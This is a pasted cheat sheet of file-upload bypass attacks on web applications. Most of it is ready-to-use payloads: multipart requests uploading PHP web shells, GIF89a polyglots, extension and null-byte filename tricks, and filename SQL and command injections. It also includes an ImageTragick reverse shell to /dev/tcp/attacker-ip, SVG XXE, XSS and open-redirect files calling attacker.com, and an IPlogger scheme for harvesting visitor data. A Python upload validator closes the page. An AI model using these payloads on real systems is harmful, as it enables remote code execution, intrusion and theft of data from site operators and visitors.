b3gund4L

Untitled

Mar 5th, 2024
1. Change the `Content-Type` value
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```
Change the Content-Type
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
```

2. Try to change the extension when sending the request. For example, here you cannot upload a file with the `php` extension, but you can upload a `jpg` file
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
```
Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```

3. Upload the payload, but start it with `GIF89a;` and
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a; <?php system("id") ?>
```
And don't forget to change the Content-Type to `image/gif`

4. Bypass content-length validation; it can be bypassed using a small payload
```
(<?=`$_GET[x]`?>)
```

5. Use a null byte in the filename
```
file.php%00.gif
```

6. Use double extensions for the uploaded file
```
file.jpg.php
```

7. Upload an uncommon PHP extension (php4, php5, php6, phtml)
```
file.php5
```

8. Try randomly capitalizing the file extension
```
file.pHP5
```

9. Mix the tips!


- Upload Function
    - Extensions Impact
        - `ASP`, `ASPX`, `PHP5`, `PHP`, `PHP3`: Webshell, RCE
        - `SVG`: Stored XSS, SSRF, XXE
        - `GIF`: Stored XSS, SSRF
        - `CSV`: CSV injection
        - `XML`: XXE
        - `AVI`: LFI, SSRF
        - `HTML`, `JS`: HTML injection, XSS, Open redirect
        - `PNG`, `JPEG`: Pixel flood attack (DoS)
        - `ZIP`: RCE via LFI, DoS
        - `PDF`, `PPTX`: SSRF, Blind XXE
    - Blacklisting Bypass
        - PHP → `.phtm`, `.phtml`, `.phps`, `.pht`, `.php2`, `.php3`, `.php4`, `.php5`, `.shtml`, `.phar`, `.pgif`, `.inc`
        - ASP → `.asp`, `.aspx`, `.cer`, `.asa`
        - JSP → `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
        - ColdFusion → `.cfm`, `.cfml`, `.cfc`, `.dbm`
        - Using random capitalization → `.pHp`, `.pHP5`, `.PhAr`
    - Whitelisting Bypass
        - `file.jpg.php`
        - `file.php.jpg`
        - `file.php.blah123jpg`
        - `file.php%00.jpg`
        - `file.php\x00.jpg`; this can also be done while uploading the file: name it `file.phpD.jpg` and change the `D` (0x44) to `00` in the hex view.
        - `file.php%00`
        - `file.php%20`
        - `file.php%0d%0a.jpg`
        - `file.php.....`
        - `file.php/`
        - `file.php.\`
        - `file.php#.png`
        - `file.`
        - `.html`
    - Vulnerabilities
        - [ ]  Directory Traversal
            - Set filename `../../etc/passwd/logo.png`
            - Set filename `../../../logo.png`, as it might change the website logo.
        - [ ]  SQL Injection
            - Set filename `'sleep(10).jpg`.
            - Set filename `sleep(10)-- -.jpg`.
        - [ ]  Command Injection
            - Set filename `; sleep 10;`
        - [ ]  SSRF
            - Abuse the "Upload from URL" feature; if the image is going to be saved on some public site, you could also point it at a URL from [IPlogger](https://iplogger.org/invisible/) and steal information about every visitor.
            - SSRF through a `.svg` file.

            ```xml
            <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="https://attacker.com/picture.jpg" /></svg>
            ```

        - [ ]  ImageTragick

            ```
            push graphic-context
            viewbox 0 0 640 480
            fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
            pop graphic-context
            ```

        - [ ]  XXE
            - Upload using a `.svg` file

            ```xml
            <?xml version="1.0" standalone="yes"?>
            <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
            <svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
               <text font-size="40" x="0" y="16">&xxe;</text>
            </svg>
            ```

            ```xml
            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
                <image xlink:href="expect://ls"></image>
            </svg>
            ```

            - Using an Excel file
        - [ ]  XSS
            - Set the file name to `filename="svg onload=alert(document.domain)>"` or `filename="58832_300x300.jpg<svg onload=confirm()>"`
            - Upload using a `.gif` file

            ```
            GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
            ```

            - Upload using a `.svg` file

            ```xml
            <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
            ```

            ```xml
            <?xml version="1.0" standalone="no"?>
            <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

            <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
               <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
               <script type="text/javascript">
                  alert("HolyBugx XSS");
               </script>
            </svg>
            ```

        - [ ]  Open Redirect
            1. Upload using a `.svg` file

            ```xml
            <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
            <svg
            onload="window.location='https://attacker.com'"
            xmlns="http://www.w3.org/2000/svg">
            <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
            </svg>
            ```

    - Content-ish Bypass
        - [ ]  Content-type validation
            - Upload `file.php` and change `Content-type: application/x-php` or `Content-Type: application/octet-stream`
            to `Content-type: image/png`, `Content-type: image/gif` or `Content-type: image/jpg`.
        - [ ]  Content-Length validation
            - Small PHP shell

            ```php
            (<?=`$_GET[x]`?>)
            ```

        - [ ]  Content Bypass Shell
            - If they check the content, add the text `GIF89a;` before your shell code (with `Content-type: image/gif`).

            ```php
            GIF89a; <?php system($_GET['cmd']); ?>
            ```

    - Misc
        - [ ]  Uploading `file.js` & `file.config` (web.config)
        - [ ]  Pixel flood attack using an image
        - [ ]  DoS with a very long filename: `1234...99.png`
        - [ ]  Zip Slip
            - If a site accepts `.zip` files, compress a `.php` file into a `.zip` and upload it. Then visit `site.com/path?page=zip://path/file.zip%23rce.php`
        - [ ]  Image Shell
            - Exiftool is a great tool to view and manipulate EXIF data. Afterwards rename the file: `mv pic.jpg pic.php.jpg`

            ```bash
            exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' pic.jpg
            ```
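As an added defensive counterpart to both the numbered steps and the checklist above (example code written for this page, not part of the original paste): a server-side upload validator that closes each listed bypass in one place. It treats the client's filename and `Content-Type` as untrusted, allows exactly one image extension, rejects any executable or markup segment anywhere in the name, checks the file's own header instead of the declared type, refuses `GIF89a`-style polyglots, and stores the file under a server-generated name. The allow-list, size limit and `validate_upload`/`storage_name` names are assumptions for the example.

```python
import re
import secrets

# Allow-listed extensions and the magic bytes a genuine file of that type starts with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
MIME_FOR = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif"}
# Segments that must not appear anywhere in the name (covers double and cased extensions).
EXEC_EXTS = {"php", "php2", "php3", "php4", "php5", "php6", "php7", "phtml", "phtm", "pht",
             "phps", "phar", "inc", "pgif", "shtml", "asp", "aspx", "asa", "cer", "jsp", "jspx",
             "jsw", "jsv", "jspf", "cfm", "cfml", "cfc", "dbm", "html", "htm", "js", "svg", "config"}
# Markup/script tokens that have no business inside a raster image (GIF89a polyglots, inline SVG).
FORBIDDEN_CONTENT = (b"<?php", b"<?=", b"<script", b"<svg", b"<!doctype", b"<?xml")
MAX_BYTES = 5 * 1024 * 1024  # assumed size limit for the example


def validate_upload(filename: str, declared_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason-or-extension). The client's filename and Content-Type are
    untrusted input; acceptance rests on the allow-list and the file's own header."""
    if "\x00" in filename or "%00" in filename or "/" in filename or "\\" in filename:
        return False, "null byte or path separator in filename"
    # Stem plus one or more non-empty dotted segments, plain ASCII only. This rejects
    # trailing dots/spaces, '#', quotes, ';', '%xx' encodings and over-long names.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})+", filename):
        return False, "filename outside the allowed character set"
    segments = filename.lower().split(".")[1:]          # every extension segment, lower-cased
    if any(s in EXEC_EXTS for s in segments):
        return False, "executable or markup extension segment: " + ".".join(segments)
    if len(segments) != 1 or segments[0] not in ALLOWED:
        return False, "exactly one allow-listed image extension is required"
    ext = segments[0]
    if declared_type.split(";")[0].strip().lower() != MIME_FOR[ext]:
        return False, "declared Content-Type does not match extension"
    if not 0 < len(data) <= MAX_BYTES:
        return False, "empty or oversized body"
    if not data.startswith(ALLOWED[ext]):                # the bytes decide, not the header
        return False, "file header does not match extension"
    body = data.lower()
    if any(tok in body for tok in FORBIDDEN_CONTENT):
        return False, "script or markup polyglot inside image"
    return True, ext


def storage_name(ext: str) -> str:
    """Server-generated on-disk name; the client-supplied filename is never reused."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Pair this with serving uploads from a separate, non-executing location so that even a validator miss does not become code execution.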